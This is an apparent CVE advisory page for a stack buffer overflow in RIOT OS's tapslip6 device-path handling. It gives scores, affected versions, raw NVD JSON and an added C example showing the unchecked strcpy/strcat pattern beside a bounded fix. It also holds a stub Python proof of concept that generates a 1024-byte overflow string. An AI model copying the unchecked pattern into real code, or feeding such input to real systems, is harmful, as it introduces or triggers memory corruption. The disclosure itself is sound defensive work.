Security Vulnerability Report
CVE-2026-22213 CVSS 9.8 CRITICAL

CVE-2026-22213

Published: 2026-01-12 23:15:52
Last Modified: 2026-01-21 17:44:39

Description

RIOT OS versions up to and including 2026.01-devel-317 contain a stack-based buffer overflow vulnerability in the tapslip6 utility. The vulnerability is caused by unsafe string concatenation in the devopen() function, which constructs a device path using unbounded user-controlled input. The utility uses strcpy() and strcat() to concatenate the fixed prefix '/dev/' with a user-supplied device name provided via the -s command-line option without bounds checking. This allows an attacker to supply an excessively long device name and overflow a fixed-size stack buffer, leading to process crashes and memory corruption.
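The flaw described above comes down to building '/dev/<name>' with strcpy() and strcat() into a fixed-size stack buffer. The C code below is an added example, not RIOT's tapslip6 source: it shows that pattern next to a bounded replacement that rejects names that do not fit. The function names and the 32-byte buffer size are assumptions, since the advisory states neither.

```c
#include <stdio.h>
#include <string.h>

#define DEV_PREFIX   "/dev/"
#define DEV_PATH_MAX 32   /* hypothetical size; the advisory does not give the real one */

/* Pattern the advisory describes: prefix + unbounded name, no length check.
 * Any name longer than DEV_PATH_MAX - strlen("/dev/") - 1 writes past `out`. */
void build_dev_path_unchecked(char out[DEV_PATH_MAX], const char *name)
{
    strcpy(out, DEV_PREFIX);
    strcat(out, name);
}

/* Bounded form: returns 0 and a NUL-terminated path on success,
 * -1 (with out set to "") if the name is missing, empty or would not fit. */
int build_dev_path(char *out, size_t outlen, const char *name)
{
    if (out == NULL || outlen == 0)
        return -1;
    out[0] = '\0';
    if (name == NULL || name[0] == '\0')
        return -1;

    int n = snprintf(out, outlen, "%s%s", DEV_PREFIX, name);
    if (n < 0 || (size_t)n >= outlen) {   /* truncated: reject, never open a cut-off path */
        out[0] = '\0';
        return -1;
    }
    return 0;
}

int main(void)
{
    char path[DEV_PATH_MAX];
    char longname[1025];                  /* constructed input: 1024 'A's, the length the page's PoC uses */
    memset(longname, 'A', sizeof longname - 1);
    longname[sizeof longname - 1] = '\0';

    const char *names[] = { "ttyUSB0", "", longname };
    for (size_t i = 0; i < sizeof names / sizeof names[0]; i++) {
        int rc = build_dev_path(path, sizeof path, names[i]);
        printf("name length %4zu -> %s\n", strlen(names[i]), rc == 0 ? path : "rejected");
    }
    return 0;
}
```

Rejecting on truncation, rather than silently shortening the name, matters here because a truncated path could name a different device than the one the user asked for.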

CVSS Details

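CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

The record's raw JSON also carries a secondary CVSS 4.0 assessment with a base score of 2.4 (LOW), attack vector LOCAL, low privileges required and active user interaction.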

Configurations (Affected Products)

cpe:2.3:o:riot-os:riot:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:riot-os:riot:2026.01:devel:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:riot-os:riot:2026.01:rc1:*:*:*:*:*:* - VULNERABLE
RIOT OS <= 2026.01-devel-317

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2026-22213 PoC - RIOT OS tapslip6 Stack Buffer Overflow

This PoC demonstrates the vulnerability by generating an oversized device name
that triggers the buffer overflow in the devopen() function.
"""


def generate_payload(payload_length=1024):
    """Generate oversized device name to trigger overflow"""
    # Generate payload with repeated 'A' characters
    # This will overflow the fixed-size stack buffer
    return 'A' * payload_length


def test_vulnerability():
    """Test for the buffer overflow vulnerability"""
    print("[*] CVE-2026-22213 PoC - RIOT OS tapslip6 Buffer Overflow")
    print("[*] Generating payload with 1024 bytes...")

    payload = generate_payload(1024)

    # Simulate the attack by passing oversized input
    # In real scenario, this would be passed to tapslip6 -s option
    print(f"[+] Payload length: {len(payload)} bytes")
    print(f"[+] Payload preview: {payload[:50]}...")
    print("[!] This oversized device name will overflow the stack buffer in devopen()")
    print("[!] The strcpy/strcat functions don't check bounds, causing overflow")

    return payload


if __name__ == "__main__":
    test_vulnerability()

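References

https://github.com/RIOT-OS/RIOT (Product)
https://seclists.org/fulldisclosure/2026/Jan/15 (Exploit, Mailing List, Third Party Advisory)
https://www.riot-os.org/ (Product)
https://www.vulncheck.com/advisories/riot-os-stack-based-buffer-overflow-in-tapslip6-utility (Third Party Advisory)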

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22213", "sourceIdentifier": "[email protected]", "published": "2026-01-12T23:15:52.300", "lastModified": "2026-01-21T17:44:38.543", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "RIOT OS versions up to and including 2026.01-devel-317 contain a stack-based buffer overflow vulnerability in the tapslip6 utility. The vulnerability is caused by unsafe string concatenation in the devopen() function, which constructs a device path using unbounded user-controlled input. The utility uses strcpy() and strcat() to concatenate the fixed prefix '/dev/' with a user-supplied device name provided via the -s command-line option without bounds checking. This allows an attacker to supply an excessively long device name and overflow a fixed-size stack buffer, leading to process crashes and memory corruption."}, {"lang": "es", "value": "Las versiones de RIOT OS hasta e incluyendo 2026.01-devel-317 contienen una vulnerabilidad de desbordamiento de búfer basado en pila en la utilidad tapslip6. La vulnerabilidad es causada por una concatenación de cadenas insegura en la función devopen(), que construye una ruta de dispositivo utilizando una entrada controlada por el usuario sin límites. La utilidad utiliza strcpy() y strcat() para concatenar el prefijo fijo '/dev/' con un nombre de dispositivo proporcionado por el usuario, suministrado a través de la opción de línea de comandos -s, sin verificación de límites. 
Esto permite a un atacante suministrar un nombre de dispositivo excesivamente largo y desbordar un búfer de pila de tamaño fijo, lo que lleva a fallos del proceso y corrupción de memoria."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.4, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": 
"LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:riot-os:riot:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025.10", "matchCriteriaId": "3EE45C18-0705-45D6-9363-63017333DFF1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:riot-os:riot:2026.01:devel:*:*:*:*:*:*", "matchCriteriaId": "51045419-7276-4017-8857-04DDBF865A1F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:riot-os:riot:2026.01:rc1:*:*:*:*:*:*", "matchCriteriaId": "D10D5F2C-4666-4D21-AED8-BE67DF223745"}]}]}], "references": [{"url": "https://github.com/RIOT-OS/RIOT", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://seclists.org/fulldisclosure/2026/Jan/15", "source": "[email protected]", "tags": ["Exploit", "Mailing List", "Third Party Advisory"]}, {"url": "https://www.riot-os.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/riot-os-stack-based-buffer-overflow-in-tapslip6-utility", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}